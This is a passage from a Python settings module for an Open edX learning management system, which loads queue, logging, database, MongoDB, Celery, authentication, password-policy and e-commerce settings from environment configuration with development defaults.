define the # routing key that points to it. At the moment, the name is the same. # We have to reset the value here, since we have changed the value of the queue name. BULK_EMAIL_ROUTING_KEY = config("BULK_EMAIL_ROUTING_KEY", default=HIGH_PRIORITY_QUEUE) # We can run smaller jobs on the low priority queue. See note above for why # we have to reset the value here. BULK_EMAIL_ROUTING_KEY_SMALL_JOBS = LOW_PRIORITY_QUEUE # Theme overrides THEME_NAME = config("THEME_NAME", default=None) COMPREHENSIVE_THEME_DIR = path( config("COMPREHENSIVE_THEME_DIR", default=COMPREHENSIVE_THEME_DIR) ) # Marketing link overrides MKTG_URL_LINK_MAP = config("MKTG_URL_LINK_MAP", default={}, formatter=json.loads) SUPPORT_SITE_LINK = config("SUPPORT_SITE_LINK", default=SUPPORT_SITE_LINK) # Mobile store URL overrides MOBILE_STORE_URLS = config("MOBILE_STORE_URLS", default=MOBILE_STORE_URLS) # Timezone overrides TIME_ZONE = config("TIME_ZONE", default=TIME_ZONE) # Translation overrides LANGUAGES = config("LANGUAGES", default=LANGUAGES, formatter=json.loads) LANGUAGE_DICT = dict(LANGUAGES) LANGUAGE_CODE = config("LANGUAGE_CODE", default=LANGUAGE_CODE) USE_I18N = config("USE_I18N", default=USE_I18N) # Additional installed apps for app in config("ADDL_INSTALLED_APPS", default=[], formatter=json.loads): INSTALLED_APPS.append(app) WIKI_ENABLED = config("WIKI_ENABLED", default=WIKI_ENABLED, formatter=bool) local_loglevel = config("LOCAL_LOGLEVEL", default="INFO") # Configure Logging LOG_DIR = config("LOG_DIR", default=path("/edx/var/logs/edx"), formatter=path) DATA_DIR = config("DATA_DIR", default=path("/edx/app/edxapp/data"), formatter=path) # Default format for syslog logging standard_format = "%(asctime)s %(levelname)s %(process)d [%(name)s] %(filename)s:%(lineno)d - %(message)s" syslog_format = ( "[variant:lms][%(name)s][env:sandbox] %(levelname)s " "[{hostname} %(process)d] [%(filename)s:%(lineno)d] - %(message)s" ).format(hostname=platform.node().split(".")[0]) LOGGING = { "version": 1, 
"disable_existing_loggers": False, "handlers": { "local": { "formatter": "syslog_format", "class": "logging.StreamHandler", "level": "INFO", }, "tracking": { "formatter": "raw", "class": "logging.StreamHandler", "level": "DEBUG", }, "console": { "formatter": "standard", "class": "logging.StreamHandler", "level": "INFO", }, }, "formatters": { "raw": {"format": "%(message)s"}, "syslog_format": {"format": syslog_format}, "standard": {"format": standard_format}, }, "filters": {"require_debug_false": {"()": "django.utils.log.RequireDebugFalse"}}, "loggers": { "": {"level": "INFO", "propagate": False, "handlers": ["console", "local"]}, "tracking": {"level": "DEBUG", "propagate": False, "handlers": ["tracking"]}, }, } SENTRY_DSN = config("SENTRY_DSN", default=None) if SENTRY_DSN: LOGGING["loggers"][""]["handlers"].append("sentry") LOGGING["handlers"]["sentry"] = { "class": "raven.handlers.logging.SentryHandler", "dsn": SENTRY_DSN, "level": "ERROR", "environment": "production", "release": RELEASE, } COURSE_LISTINGS = config("COURSE_LISTINGS", default={}, formatter=json.loads) SUBDOMAIN_BRANDING = config("SUBDOMAIN_BRANDING", default={}, formatter=json.loads) VIRTUAL_UNIVERSITIES = config("VIRTUAL_UNIVERSITIES", default=[]) META_UNIVERSITIES = config("META_UNIVERSITIES", default={}, formatter=json.loads) COMMENTS_SERVICE_URL = config("COMMENTS_SERVICE_URL", default="") COMMENTS_SERVICE_KEY = config("COMMENTS_SERVICE_KEY", default="") CERT_NAME_SHORT = config("CERT_NAME_SHORT", default=CERT_NAME_SHORT) CERT_NAME_LONG = config("CERT_NAME_LONG", default=CERT_NAME_LONG) CERT_QUEUE = config("CERT_QUEUE", default="test-pull") ZENDESK_URL = config("ZENDESK_URL", default=None) FEEDBACK_SUBMISSION_EMAIL = config("FEEDBACK_SUBMISSION_EMAIL", default=None) MKTG_URLS = config("MKTG_URLS", default=MKTG_URLS, formatter=json.loads) # Badgr API BADGR_API_TOKEN = config("BADGR_API_TOKEN", default=BADGR_API_TOKEN) BADGR_BASE_URL = config("BADGR_BASE_URL", default=BADGR_BASE_URL) 
BADGR_ISSUER_SLUG = config("BADGR_ISSUER_SLUG", default=BADGR_ISSUER_SLUG) # git repo loading environment GIT_REPO_DIR = config( "GIT_REPO_DIR", default=path("/edx/var/edxapp/course_repos"), formatter=path ) GIT_IMPORT_STATIC = config("GIT_IMPORT_STATIC", default=True) for name, value in config("CODE_JAIL", default={}, formatter=json.loads).items(): oldvalue = CODE_JAIL.get(name) if isinstance(oldvalue, dict): for subname, subvalue in value.items(): oldvalue[subname] = subvalue else: CODE_JAIL[name] = value COURSES_WITH_UNSAFE_CODE = config( "COURSES_WITH_UNSAFE_CODE", default=[], formatter=json.loads ) ASSET_IGNORE_REGEX = config("ASSET_IGNORE_REGEX", default=ASSET_IGNORE_REGEX) # Event Tracking TRACKING_IGNORE_URL_PATTERNS = config( "TRACKING_IGNORE_URL_PATTERNS", default=TRACKING_IGNORE_URL_PATTERNS, formatter=json.loads, ) # SSL external authentication settings SSL_AUTH_EMAIL_DOMAIN = config("SSL_AUTH_EMAIL_DOMAIN", default="MIT.EDU") SSL_AUTH_DN_FORMAT_STRING = config("SSL_AUTH_DN_FORMAT_STRING", default=None) # Django CAS external authentication settings CAS_EXTRA_LOGIN_PARAMS = config( "CAS_EXTRA_LOGIN_PARAMS", default=None, formatter=json.loads ) if FEATURES.get("AUTH_USE_CAS"): CAS_SERVER_URL = config("CAS_SERVER_URL", default=None) INSTALLED_APPS.append("django_cas") MIDDLEWARE_CLASSES.append("django_cas.middleware.CASMiddleware") CAS_ATTRIBUTE_CALLBACK = config( "CAS_ATTRIBUTE_CALLBACK", default=None, formatter=json.loads ) if CAS_ATTRIBUTE_CALLBACK: import importlib CAS_USER_DETAILS_RESOLVER = getattr( importlib.import_module(CAS_ATTRIBUTE_CALLBACK["module"]), CAS_ATTRIBUTE_CALLBACK["function"], ) # Video Caching. Pairing country codes with CDN URLs. 
# Example: {'CN': 'http://api.xuetangx.com/edx/video?s3_url='} VIDEO_CDN_URL = config("VIDEO_CDN_URL", default={}, formatter=json.loads) # Branded footer FOOTER_OPENEDX_URL = config("FOOTER_OPENEDX_URL", default=FOOTER_OPENEDX_URL) FOOTER_OPENEDX_LOGO_IMAGE = config( "FOOTER_OPENEDX_LOGO_IMAGE", default=FOOTER_OPENEDX_LOGO_IMAGE ) FOOTER_ORGANIZATION_IMAGE = config( "FOOTER_ORGANIZATION_IMAGE", default=FOOTER_ORGANIZATION_IMAGE ) FOOTER_CACHE_TIMEOUT = config( "FOOTER_CACHE_TIMEOUT", default=FOOTER_CACHE_TIMEOUT, formatter=int ) FOOTER_BROWSER_CACHE_MAX_AGE = config( "FOOTER_BROWSER_CACHE_MAX_AGE", default=FOOTER_BROWSER_CACHE_MAX_AGE, formatter=int ) # Credit notifications settings NOTIFICATION_EMAIL_CSS = config( "NOTIFICATION_EMAIL_CSS", default=NOTIFICATION_EMAIL_CSS ) NOTIFICATION_EMAIL_EDX_LOGO = config( "NOTIFICATION_EMAIL_EDX_LOGO", default=NOTIFICATION_EMAIL_EDX_LOGO ) ############# CORS headers for cross-domain requests ################# if FEATURES.get("ENABLE_CORS_HEADERS") or FEATURES.get( "ENABLE_CROSS_DOMAIN_CSRF_COOKIE" ): CORS_ALLOW_CREDENTIALS = True CORS_ORIGIN_WHITELIST = config( "CORS_ORIGIN_WHITELIST", default=(), formatter=json.loads ) CORS_ORIGIN_ALLOW_ALL = config( "CORS_ORIGIN_ALLOW_ALL", default=False, formatter=bool ) CORS_ALLOW_INSECURE = config("CORS_ALLOW_INSECURE", default=False, formatter=bool) # If setting a cross-domain cookie, it's really important to choose # a name for the cookie that is DIFFERENT than the cookies used # by each subdomain. For example, suppose the applications # at these subdomains are configured to use the following cookie names: # # 1) foo.example.com --> "csrftoken" # 2) baz.example.com --> "csrftoken" # 3) bar.example.com --> "csrftoken" # # For the cross-domain version of the CSRF cookie, you need to choose # a name DIFFERENT than "csrftoken"; otherwise, the new token configured # for ".example.com" could conflict with the other cookies, # non-deterministically causing 403 responses. 
# # Because of the way Django stores cookies, the cookie name MUST # be a `str`, not unicode. Otherwise there will `TypeError`s will be raised # when Django tries to call the unicode `translate()` method with the wrong # number of parameters. CROSS_DOMAIN_CSRF_COOKIE_NAME = str(config("CROSS_DOMAIN_CSRF_COOKIE_NAME")) # When setting the domain for the "cross-domain" version of the CSRF # cookie, you should choose something like: ".example.com" # (note the leading dot), where both the referer and the host # are subdomains of "example.com". # # Browser security rules require that # the cookie domain matches the domain of the server; otherwise # the cookie won't get set. And once the cookie gets set, the client # needs to be on a domain that matches the cookie domain, otherwise # the client won't be able to read the cookie. CROSS_DOMAIN_CSRF_COOKIE_DOMAIN = config("CROSS_DOMAIN_CSRF_COOKIE_DOMAIN") # Field overrides. To use the IDDE feature, add # 'courseware.student_field_overrides.IndividualStudentOverrideProvider'. FIELD_OVERRIDE_PROVIDERS = tuple( config("FIELD_OVERRIDE_PROVIDERS", default=[], formatter=json.loads) ) ############################## SECURE AUTH ITEMS ############### # Secret things: passwords, access keys, etc. 
############### XBlock filesystem field config ########## DJFS = config( "DJFS", default={ "directory_root": "/edx/var/edxapp/django-pyfs/static/django-pyfs", "type": "osfs", "url_root": "/static/django-pyfs", }, formatter=json.loads, ) ############### Module Store Items ########## HOSTNAME_MODULESTORE_DEFAULT_MAPPINGS = config( "HOSTNAME_MODULESTORE_DEFAULT_MAPPINGS", default={}, formatter=json.loads ) # PREVIEW DOMAIN must be present in HOSTNAME_MODULESTORE_DEFAULT_MAPPINGS for the preview to show draft changes if "PREVIEW_LMS_BASE" in FEATURES and FEATURES["PREVIEW_LMS_BASE"] != "": PREVIEW_DOMAIN = FEATURES["PREVIEW_LMS_BASE"].split(":")[0] # update dictionary with preview domain regex HOSTNAME_MODULESTORE_DEFAULT_MAPPINGS.update({PREVIEW_DOMAIN: "draft-preferred"}) ############### Mixed Related(Secure/Not-Secure) Items ########## LMS_SEGMENT_KEY = config("LMS_SEGMENT_KEY", default=None) CC_PROCESSOR_NAME = config("CC_PROCESSOR_NAME", default=CC_PROCESSOR_NAME) CC_PROCESSOR = config("CC_PROCESSOR", default=CC_PROCESSOR) SECRET_KEY = config("SECRET_KEY", default="ThisisAnExampleKeyForDevPurposeOnly") # Authentication backends # - behind a proxy, use: "lms.envs.fun.backends.ProxyRateLimitModelBackend" # - for LTI provider, add: "lti_provider.users.LtiBackend" # - for CAS, add: "django_cas.backends.CASBackend" AUTHENTICATION_BACKENDS = config( "AUTHENTICATION_BACKENDS", default=("lms.envs.fun.backends.ProxyRateLimitModelBackend",), ) DEFAULT_FILE_STORAGE = config( "DEFAULT_FILE_STORAGE", default="django.core.files.storage.FileSystemStorage" ) # Specific setting for the File Upload Service to store media in a bucket. 
FILE_UPLOAD_STORAGE_BUCKET_NAME = config(
    "FILE_UPLOAD_STORAGE_BUCKET_NAME", default="uploads"
)
FILE_UPLOAD_STORAGE_PREFIX = config(
    "FILE_UPLOAD_STORAGE_PREFIX", default=FILE_UPLOAD_STORAGE_PREFIX
)

# If there is a database called 'read_replica', you can use the use_read_replica_if_available
# function in util/query.py, which is useful for very large database reads
DATABASE_ENGINE = config("DATABASE_ENGINE", default="django.db.backends.mysql")
DATABASE_HOST = config("DATABASE_HOST", default="mysql")
DATABASE_PORT = config("DATABASE_PORT", default=3306, formatter=int)
DATABASE_NAME = config("DATABASE_NAME", default="edxapp")
DATABASE_USER = config("DATABASE_USER", default="edxapp_user")
DATABASE_PASSWORD = config("DATABASE_PASSWORD", default="password")

DATABASES = config(
    "DATABASES",
    default={
        "default": {
            "ENGINE": DATABASE_ENGINE,
            "HOST": DATABASE_HOST,
            "PORT": DATABASE_PORT,
            "NAME": DATABASE_NAME,
            "USER": DATABASE_USER,
            "PASSWORD": DATABASE_PASSWORD,
        }
    },
    formatter=json.loads,
)

# Enable automatic transaction management on all databases
# https://docs.djangoproject.com/en/1.8/topics/db/transactions/#tying-transactions-to-http-requests
# This needs to be true for all databases
for database_name in DATABASES:
    DATABASES[database_name]["ATOMIC_REQUESTS"] = True

XQUEUE_INTERFACE = config(
    "XQUEUE_INTERFACE",
    default={"url": None, "basic_auth": None, "django_auth": None},
    formatter=json.loads,
)

# Configure the MODULESTORE
MODULESTORE = convert_module_store_setting_if_needed(
    config("MODULESTORE", default=MODULESTORE, formatter=json.loads)
)

# MongoDB connection settings, shared between the modulestore document store
# and the content store below.
MONGODB_PASSWORD = config("MONGODB_PASSWORD", default="")
MONGODB_HOST = config("MONGODB_HOST", default="mongodb")
MONGODB_PORT = config("MONGODB_PORT", default=27017, formatter=int)
MONGODB_NAME = config("MONGODB_NAME", default="edxapp")
MONGODB_USER = config("MONGODB_USER", default=None)
MONGODB_SSL = config("MONGODB_SSL", default=False, formatter=bool)
MONGODB_REPLICASET = config("MONGODB_REPLICASET", default=None)
# Accepted read_preference value can be found here https://github.com/mongodb/mongo-python-driver/blob/2.9.1/pymongo/read_preferences.py#L54
MONGODB_READ_PREFERENCE = config("MONGODB_READ_PREFERENCE", default="PRIMARY")

DOC_STORE_CONFIG = config(
    "DOC_STORE_CONFIG",
    default={
        "collection": "modulestore",
        "host": MONGODB_HOST,
        "port": MONGODB_PORT,
        "db": MONGODB_NAME,
        "user": MONGODB_USER,
        # FIX: was a redacted "<PASSWORD>" placeholder (a SyntaxError); wire in
        # the MONGODB_PASSWORD setting defined above, mirroring the other
        # MONGODB_* keys of this mapping.
        "password": MONGODB_PASSWORD,
        "ssl": MONGODB_SSL,
        "replicaSet": MONGODB_REPLICASET,
        "read_preference": MONGODB_READ_PREFERENCE,
    },
    formatter=json.loads,
)
update_module_store_settings(MODULESTORE, doc_store_settings=DOC_STORE_CONFIG)

MONGODB_LOG = config("MONGODB_LOG", default={}, formatter=json.loads)

CONTENTSTORE = config(
    "CONTENTSTORE",
    default={
        "DOC_STORE_CONFIG": DOC_STORE_CONFIG,
        "ENGINE": "xmodule.contentstore.mongo.MongoContentStore",
    },
    formatter=json.loads,
)

EMAIL_HOST_USER = config("EMAIL_HOST_USER", default="")  # django default is ''
EMAIL_HOST_PASSWORD = config("EMAIL_HOST_PASSWORD", default="")  # django default is ''

# Datadog for events!
DATADOG = config("DATADOG", default={}, formatter=json.loads)
# TODO: deprecated (compatibility with previous settings)
DATADOG_API = config("DATADOG_API", default=None)

# Analytics dashboard server
ANALYTICS_SERVER_URL = config("ANALYTICS_SERVER_URL", default=None)
ANALYTICS_API_KEY = config("ANALYTICS_API_KEY", default="")

# Analytics data source
ANALYTICS_DATA_URL = config("ANALYTICS_DATA_URL", default=ANALYTICS_DATA_URL)
ANALYTICS_DATA_TOKEN = config("ANALYTICS_DATA_TOKEN", default=ANALYTICS_DATA_TOKEN)

# Analytics Dashboard
# when True this setting add a link in instructor dashbord to analytics insight service
ANALYTICS_DASHBOARD_URL = config(
    "ANALYTICS_DASHBOARD_URL", default=False, formatter=bool
)
ANALYTICS_DASHBOARD_NAME = config(
    "ANALYTICS_DASHBOARD_NAME", default=PLATFORM_NAME + " Insights"
)

# Mailchimp New User List
MAILCHIMP_NEW_USER_LIST_ID = config("MAILCHIMP_NEW_USER_LIST_ID", default=None)

# Zendesk
ZENDESK_USER = config("ZENDESK_USER", default=None)
ZENDESK_API_KEY = config("ZENDESK_API_KEY", default=None)

# API Key for inbound requests from Notifier service
EDX_API_KEY = config("EDX_API_KEY", default=None)

# Celery Broker
# For redis sentinel use the redis-sentinel transport
CELERY_BROKER_TRANSPORT = config("CELERY_BROKER_TRANSPORT", default="redis")
CELERY_BROKER_USER = config("CELERY_BROKER_USER", default="")
CELERY_BROKER_PASSWORD = config("CELERY_BROKER_PASSWORD", default="")
CELERY_BROKER_HOST = config("CELERY_BROKER_HOST", default="redis")
CELERY_BROKER_PORT = config("CELERY_BROKER_PORT", default=6379, formatter=int)
CELERY_BROKER_VHOST = config("CELERY_BROKER_VHOST", default=0, formatter=int)

if CELERY_BROKER_TRANSPORT == "redis-sentinel":
    # register redis sentinel schema in celery
    register()

BROKER_URL = "{transport}://{user}:{password}@{host}:{port}/{vhost}".format(
    transport=CELERY_BROKER_TRANSPORT,
    user=CELERY_BROKER_USER,
    # FIX: was a redacted "<PASSWORD>" placeholder (a SyntaxError); use the
    # CELERY_BROKER_PASSWORD setting defined above, matching the other
    # CELERY_BROKER_* keyword arguments of this format call.
    password=CELERY_BROKER_PASSWORD,
    host=CELERY_BROKER_HOST,
    port=CELERY_BROKER_PORT,
    vhost=CELERY_BROKER_VHOST,
)
# To use redis-sentinel, refer to the documentation here
# https://celery-redis-sentinel.readthedocs.io/en/latest/
BROKER_TRANSPORT_OPTIONS = config(
    "BROKER_TRANSPORT_OPTIONS", default={}, formatter=json.loads
)

# upload limits
STUDENT_FILEUPLOAD_MAX_SIZE = config(
    "STUDENT_FILEUPLOAD_MAX_SIZE", default=STUDENT_FILEUPLOAD_MAX_SIZE, formatter=int
)

# Event tracking
TRACKING_BACKENDS.update(config("TRACKING_BACKENDS", default={}, formatter=json.loads))
EVENT_TRACKING_BACKENDS["tracking_logs"]["OPTIONS"]["backends"].update(
    config("EVENT_TRACKING_BACKENDS", default={}, formatter=json.loads)
)
EVENT_TRACKING_BACKENDS["segmentio"]["OPTIONS"]["processors"][0]["OPTIONS"][
    "whitelist"
].extend(
    config("EVENT_TRACKING_SEGMENTIO_EMIT_WHITELIST", default=[], formatter=json.loads)
)
TRACKING_SEGMENTIO_WEBHOOK_SECRET = config(
    "TRACKING_SEGMENTIO_WEBHOOK_SECRET", default=TRACKING_SEGMENTIO_WEBHOOK_SECRET
)
TRACKING_SEGMENTIO_ALLOWED_TYPES = config(
    "TRACKING_SEGMENTIO_ALLOWED_TYPES",
    default=TRACKING_SEGMENTIO_ALLOWED_TYPES,
    formatter=json.loads,
)
TRACKING_SEGMENTIO_DISALLOWED_SUBSTRING_NAMES = config(
    "TRACKING_SEGMENTIO_DISALLOWED_SUBSTRING_NAMES",
    default=TRACKING_SEGMENTIO_DISALLOWED_SUBSTRING_NAMES,
    formatter=json.loads,
)
TRACKING_SEGMENTIO_SOURCE_MAP = config(
    "TRACKING_SEGMENTIO_SOURCE_MAP",
    default=TRACKING_SEGMENTIO_SOURCE_MAP,
    formatter=json.loads,
)

# Student identity verification settings
VERIFY_STUDENT = config("VERIFY_STUDENT", default=VERIFY_STUDENT, formatter=json.loads)

# Grades download
GRADES_DOWNLOAD_ROUTING_KEY = config(
    "GRADES_DOWNLOAD_ROUTING_KEY", default=HIGH_MEM_QUEUE
)
# FIX: GRADES_DOWNLOAD used to be assigned twice in a row; the second
# assignment silently dropped the json.loads formatter from the first.
# Keep the single, formatted assignment.
GRADES_DOWNLOAD = config(
    "GRADES_DOWNLOAD", default=GRADES_DOWNLOAD, formatter=json.loads
)

# financial reports
FINANCIAL_REPORTS = config(
    "FINANCIAL_REPORTS", default=FINANCIAL_REPORTS, formatter=json.loads
)

##### ACCOUNT LOCKOUT DEFAULT PARAMETERS #####
MAX_FAILED_LOGIN_ATTEMPTS_ALLOWED = config(
    "MAX_FAILED_LOGIN_ATTEMPTS_ALLOWED", default=5, formatter=int
)
MAX_FAILED_LOGIN_ATTEMPTS_LOCKOUT_PERIOD_SECS = config(
    "MAX_FAILED_LOGIN_ATTEMPTS_LOCKOUT_PERIOD_SECS", default=15 * 60, formatter=int
)

MICROSITE_CONFIGURATION = config(
    "MICROSITE_CONFIGURATION", default={}, formatter=json.loads
)
MICROSITE_ROOT_DIR = path(config("MICROSITE_ROOT_DIR", default=""))

#### PASSWORD POLICY SETTINGS #####
PASSWORD_MIN_LENGTH = config("PASSWORD_MIN_LENGTH", default=12, formatter=int)
PASSWORD_MAX_LENGTH = config("PASSWORD_MAX_LENGTH", default=None, formatter=int)
PASSWORD_COMPLEXITY = config(
    "PASSWORD_COMPLEXITY",
    default={"UPPER": 1, "LOWER": 1, "DIGITS": 1},
    formatter=json.loads,
)
PASSWORD_DICTIONARY_EDIT_DISTANCE_THRESHOLD = config(
    "PASSWORD_DICTIONARY_EDIT_DISTANCE_THRESHOLD",
    default=PASSWORD_DICTIONARY_EDIT_DISTANCE_THRESHOLD,
    formatter=int,
)
PASSWORD_DICTIONARY = config("PASSWORD_DICTIONARY", default=[], formatter=json.loads)

### INACTIVITY SETTINGS ####
SESSION_INACTIVITY_TIMEOUT_IN_SECONDS = config(
    "SESSION_INACTIVITY_TIMEOUT_IN_SECONDS", default=None, formatter=int
)

##### LMS DEADLINE DISPLAY TIME_ZONE #######
TIME_ZONE_DISPLAYED_FOR_DEADLINES = config(
    "TIME_ZONE_DISPLAYED_FOR_DEADLINES", default=TIME_ZONE_DISPLAYED_FOR_DEADLINES
)

##### X-Frame-Options response header settings #####
X_FRAME_OPTIONS = config("X_FRAME_OPTIONS", default=X_FRAME_OPTIONS)

##### Third-party auth options ################################################
if FEATURES.get("ENABLE_THIRD_PARTY_AUTH"):
    # The reduced session expiry time during the third party login pipeline. (Value in seconds)
    SOCIAL_AUTH_PIPELINE_TIMEOUT = config("SOCIAL_AUTH_PIPELINE_TIMEOUT", default=600)

    # The SAML private/public key values do not need the delimiter lines (such as
    # "-----BEGIN PRIVATE KEY-----" / "-----END PRIVATE KEY-----" etc.) but they may be included
    # if you want (though it's easier to format the key values as JSON without the delimiters).
SOCIAL_AUTH_SAML_SP_PRIVATE_KEY = config( "SOCIAL_AUTH_SAML_SP_PRIVATE_KEY", default="" ) SOCIAL_AUTH_SAML_SP_PUBLIC_CERT = config( "SOCIAL_AUTH_SAML_SP_PUBLIC_CERT", default="" ) SOCIAL_AUTH_OAUTH_SECRETS = config( "SOCIAL_AUTH_OAUTH_SECRETS", default={}, formatter=json.loads ) SOCIAL_AUTH_LTI_CONSUMER_SECRETS = config( "SOCIAL_AUTH_LTI_CONSUMER_SECRETS", default={}, formatter=json.loads ) # third_party_auth config moved to ConfigurationModels. This is for data migration only: THIRD_PARTY_AUTH_OLD_CONFIG = config("THIRD_PARTY_AUTH", default=None) if ( config("THIRD_PARTY_AUTH_SAML_FETCH_PERIOD_HOURS", default=24, formatter=int) is not None ): CELERYBEAT_SCHEDULE["refresh-saml-metadata"] = { "task": "third_party_auth.fetch_saml_metadata", "schedule": datetime.timedelta( hours=config( "THIRD_PARTY_AUTH_SAML_FETCH_PERIOD_HOURS", default=24, formatter=int, ) ), } # The following can be used to integrate a custom login form with third_party_auth. # It should be a dict where the key is a word passed via ?auth_entry=, and the value is a # dict with an arbitrary 'secret_key' and a 'url'. 
THIRD_PARTY_AUTH_CUSTOM_AUTH_FORMS = config( "THIRD_PARTY_AUTH_CUSTOM_AUTH_FORMS", default={}, formatter=json.loads ) ##### OAUTH2 Provider ############## if FEATURES.get("ENABLE_OAUTH2_PROVIDER"): OAUTH_OIDC_ISSUER = config("OAUTH_OIDC_ISSUER", default=None) OAUTH_ENFORCE_SECURE = config("OAUTH_ENFORCE_SECURE", default=True, formatter=bool) OAUTH_ENFORCE_CLIENT_SECURE = config( "OAUTH_ENFORCE_CLIENT_SECURE", default=True, formatter=bool ) ##### ADVANCED_SECURITY_CONFIG ##### ADVANCED_SECURITY_CONFIG = config( "ADVANCED_SECURITY_CONFIG", default={}, formatter=json.loads ) ##### GOOGLE ANALYTICS IDS ##### GOOGLE_ANALYTICS_ACCOUNT = config("GOOGLE_ANALYTICS_ACCOUNT", default=None) GOOGLE_ANALYTICS_LINKEDIN = config("GOOGLE_ANALYTICS_LINKEDIN", default=None) ##### OPTIMIZELY PROJECT ID ##### OPTIMIZELY_PROJECT_ID = config("OPTIMIZELY_PROJECT_ID", default=OPTIMIZELY_PROJECT_ID) #### Course Registration Code length #### REGISTRATION_CODE_LENGTH = config("REGISTRATION_CODE_LENGTH", default=8, formatter=int) # REGISTRATION CODES DISPLAY INFORMATION INVOICE_CORP_ADDRESS = config("INVOICE_CORP_ADDRESS", default=INVOICE_CORP_ADDRESS) INVOICE_PAYMENT_INSTRUCTIONS = config( "INVOICE_PAYMENT_INSTRUCTIONS", default=INVOICE_PAYMENT_INSTRUCTIONS ) # Which access.py permission names to check; # We default this to the legacy permission 'see_exists'. 
COURSE_CATALOG_VISIBILITY_PERMISSION = config( "COURSE_CATALOG_VISIBILITY_PERMISSION", default=COURSE_CATALOG_VISIBILITY_PERMISSION ) COURSE_ABOUT_VISIBILITY_PERMISSION = config( "COURSE_ABOUT_VISIBILITY_PERMISSION", default=COURSE_ABOUT_VISIBILITY_PERMISSION ) # Enrollment API Cache Timeout ENROLLMENT_COURSE_DETAILS_CACHE_TIMEOUT = config( "ENROLLMENT_COURSE_DETAILS_CACHE_TIMEOUT", default=60, formatter=int ) # PDF RECEIPT/INVOICE OVERRIDES PDF_RECEIPT_TAX_ID = config("PDF_RECEIPT_TAX_ID", default=PDF_RECEIPT_TAX_ID) PDF_RECEIPT_FOOTER_TEXT = config( "PDF_RECEIPT_FOOTER_TEXT", default=PDF_RECEIPT_FOOTER_TEXT ) PDF_RECEIPT_DISCLAIMER_TEXT = config( "PDF_RECEIPT_DISCLAIMER_TEXT", default=PDF_RECEIPT_DISCLAIMER_TEXT ) PDF_RECEIPT_BILLING_ADDRESS = config( "PDF_RECEIPT_BILLING_ADDRESS", default=PDF_RECEIPT_BILLING_ADDRESS ) PDF_RECEIPT_TERMS_AND_CONDITIONS = config( "PDF_RECEIPT_TERMS_AND_CONDITIONS", default=PDF_RECEIPT_TERMS_AND_CONDITIONS ) PDF_RECEIPT_TAX_ID_LABEL = config( "PDF_RECEIPT_TAX_ID_LABEL", default=PDF_RECEIPT_TAX_ID_LABEL ) PDF_RECEIPT_LOGO_PATH = config("PDF_RECEIPT_LOGO_PATH", default=PDF_RECEIPT_LOGO_PATH) PDF_RECEIPT_COBRAND_LOGO_PATH = config( "PDF_RECEIPT_COBRAND_LOGO_PATH", default=PDF_RECEIPT_COBRAND_LOGO_PATH ) PDF_RECEIPT_LOGO_HEIGHT_MM = config( "PDF_RECEIPT_LOGO_HEIGHT_MM", default=PDF_RECEIPT_LOGO_HEIGHT_MM, formatter=int ) PDF_RECEIPT_COBRAND_LOGO_HEIGHT_MM = config( "PDF_RECEIPT_COBRAND_LOGO_HEIGHT_MM", default=PDF_RECEIPT_COBRAND_LOGO_HEIGHT_MM, formatter=int, ) if ( FEATURES.get("ENABLE_COURSEWARE_SEARCH") or FEATURES.get("ENABLE_DASHBOARD_SEARCH") or FEATURES.get("ENABLE_COURSE_DISCOVERY") or FEATURES.get("ENABLE_TEAMS") ): # Use ElasticSearch as the search engine herein SEARCH_ENGINE = "search.elastic.ElasticSearchEngine" ELASTIC_SEARCH_CONFIG = config( "ELASTIC_SEARCH_CONFIG", default=[{}], formatter=json.loads ) # Facebook app FACEBOOK_API_VERSION = config("FACEBOOK_API_VERSION", default=None) FACEBOOK_APP_SECRET = 
config("FACEBOOK_APP_SECRET", default=None) FACEBOOK_APP_ID = config("FACEBOOK_APP_ID", default=None) XBLOCK_SETTINGS = config("XBLOCK_SETTINGS", default={}, formatter=json.loads) XBLOCK_SETTINGS.setdefault("VideoDescriptor", {})["licensing_enabled"] = FEATURES.get( "LICENSING", False ) XBLOCK_SETTINGS.setdefault("VideoModule", {})["YOUTUBE_API_KEY"] = config( "YOUTUBE_API_KEY", default=YOUTUBE_API_KEY ) ##### CDN EXPERIMENT/MONITORING FLAGS ##### CDN_VIDEO_URLS = config("CDN_VIDEO_URLS", default=CDN_VIDEO_URLS) ONLOAD_BEACON_SAMPLE_RATE = config( "ONLOAD_BEACON_SAMPLE_RATE", default=ONLOAD_BEACON_SAMPLE_RATE ) ##### ECOMMERCE API CONFIGURATION SETTINGS ##### ECOMMERCE_PUBLIC_URL_ROOT = config( "ECOMMERCE_PUBLIC_URL_ROOT", default=ECOMMERCE_PUBLIC_URL_ROOT ) ECOMMERCE_API_URL = config("ECOMMERCE_API_URL", default=ECOMMERCE_API_URL) ECOMMERCE_API_TIMEOUT = config( "ECOMMERCE_API_TIMEOUT", default=ECOMMERCE_API_TIMEOUT, formatter=int ) ECOMMERCE_SERVICE_WORKER_USERNAME = config( "ECOMMERCE_SERVICE_WORKER_USERNAME", default=ECOMMERCE_SERVICE_WORKER_USERNAME ) ECOMMERCE_API_TIMEOUT = config("ECOMMERCE_API_TIMEOUT", default=ECOMMERCE_API_TIMEOUT) ECOMMERCE_API_SIGNING_KEY = config( "ECOMMERCE_API_SIGNING_KEY", default=ECOMMERCE_API_SIGNING_KEY ) ##### Custom Courses for EdX ##### if FEATURES.get("CUSTOM_COURSES_EDX"): INSTALLED_APPS += ("lms.djangoapps.ccx",) FIELD_OVERRIDE_PROVIDERS += ( "lms.djangoapps.ccx.overrides.CustomCoursesForEdxOverrideProvider", ) CCX_MAX_STUDENTS_ALLOWED = config( "CCX_MAX_STUDENTS_ALLOWED", default=CCX_MAX_STUDENTS_ALLOWED ) ##### Individual Due Date Extensions ##### if FEATURES.get("INDIVIDUAL_DUE_DATES"): FIELD_OVERRIDE_PROVIDERS += ( "courseware.student_field_overrides.IndividualStudentOverrideProvider", ) ##### Self-Paced Course Due Dates ##### FIELD_OVERRIDE_PROVIDERS += ( "courseware.self_paced_overrides.SelfPacedDateOverrideProvider", ) # PROFILE IMAGE CONFIG PROFILE_IMAGE_BACKEND = config("PROFILE_IMAGE_BACKEND", 
